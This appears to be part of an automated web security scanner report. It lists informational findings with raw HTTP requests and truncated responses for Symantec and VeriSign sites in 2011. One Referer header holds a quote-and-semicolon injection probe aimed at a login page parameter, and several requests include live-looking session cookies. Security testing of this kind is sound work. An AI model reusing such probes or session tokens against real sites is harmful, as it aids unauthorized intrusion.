22.20. https://fileconnect.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/

Request

Response

22.21. https://fileconnect.symantec.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:04:04 GMT
Content-length: 1214
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

22.22. https://fileconnect.symantec.com/javascript/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/javascript/common.js

Request

GET /javascript/common.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:55 GMT
Content-length: 1214
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close


</script>

22.24. https://knowledge.verisign.com/support/code-signing-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index

Request

GET /support/code-signing-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:44:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close


</script>

22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index

Request

GET /support/mpki-for-ssl-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:44:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close


</script>

22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index

Request

GET /support/ssl-certificates-support/index HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 09 Sep 2011 21:43:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Connection: close


</script>

22.27. http://partnerlocator.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/

Request

GET / HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:46:04 GMT
Content-Type: text/html
Content-Length: 615
Connection: close

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.28. http://partnerlocator.symantec.com/public/product_finder previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/public/product_finder

Request

GET /public/product_finder HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:45:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 34

<h1>500 Internal Server Error</h1>

22.29. http://partnerlocator.symantec.com/public/pulldown_list previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/public/pulldown_list

Request

GET /public/pulldown_list;plist=country;search_term=un;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
X-Prototype-Version: 1.5.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:52 GMT
Content-Type: text/html
Content-Length: 615
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.30. http://partnerlocator.symantec.com/public/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/public/search

Request

POST /public/search HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
Content-Length: 85
Cache-Control: max-age=0
Origin: http://partnerlocator.symantec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Djavascript%2525253Arequired_country_with_submit%25252528document.select_country%2525252C%25252527Please%25252520select%25252520a%25252520country.%25252527%25252529%2525253B%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

locale=en-us&country=United+Arab+Emirates&country_name=United+Arab+Emirates+&_search=

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:58 GMT
Content-Type: text/html
Content-Length: 615
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.8.54</center>
</bod
...[SNIP]...

22.31. https://partnernet.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://partnernet.symantec.com
Path:	/

Request

GET / HTTP/1.1
Host: partnernet.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.32. http://player.ooyala.com/info/primary/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/info/primary/

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 381
Date: Fri, 09 Sep 2011 21:25:47 GMT
Connection: close
Vary: Accept-Encoding

LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ
...[SNIP]...

22.33. https://policy3.responsys.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/

Request

Response

22.34. https://renewals.symantec.com/renewals/chat_norton.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/chat_norton.jsp

Request

GET /renewals/chat_norton.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.35. https://securitycenter.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/

Request

Response

22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/orderStatus

Request

GET /celp/enroll/orderStatus HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:32 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.38. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Request

Response

22.39. https://securitycenter.verisign.com/celp/enroll/upsell previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/upsell

Request

GET /celp/enroll/upsell HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:32 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ4o0r1eq0XdEuNa8cCA2iDyk4r5r7iuywwlssiJ0mmB13GoVxZ!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Request

Response

22.41. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Request

Response

22.42. http://www.verisign.ch/assets/global/js/leftnav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/global/js/leftnav.js

Request

GET /assets/global/js/leftnav.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
* Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/shared/js/jquery.url.packed.js

Request

GET /assets/shared/js/jquery.url.packed.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 1935
Content-Type: text/html

jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",
...[SNIP]...

22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/shared/js/leftnav_new.js

Request

GET /assets/shared/js/leftnav_new.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4994
Content-Type: text/html

/**
* Version 2.0
* Author: Rob Perez
* Date: August 20, 2010
*
* Usage:
*
* Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired.
*
* Somew
...[SNIP]...

22.45. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Request

Response

22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Request

GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 22346

////////////////////////////////////
//Main JS functions for verisign.com
////////////////////////////////////

function findObj(n, d){
var p,i,x; if(!d) d=document;
if((p=n.indexOf("?"))>0&&pa
...[SNIP]...

22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Request

GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3364
Content-Type: text/html

/////////////////////////////////////////////////////////////////////////////
// Function : vrsnNavMenuElements
// Comments :
/////////////////////////////////////////////////////////////////////////
...[SNIP]...

22.48. http://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/

Request

Response

22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Type: text/html
Content-Length: 8048

//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
//document.get
...[SNIP]...

22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Length: 1558
Content-Type: text/html

/*******************************************
** Header functions **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/jquery.autocomplete.js

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:19 GMT
Content-Type: text/html
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 J..rn Zaefferer
*
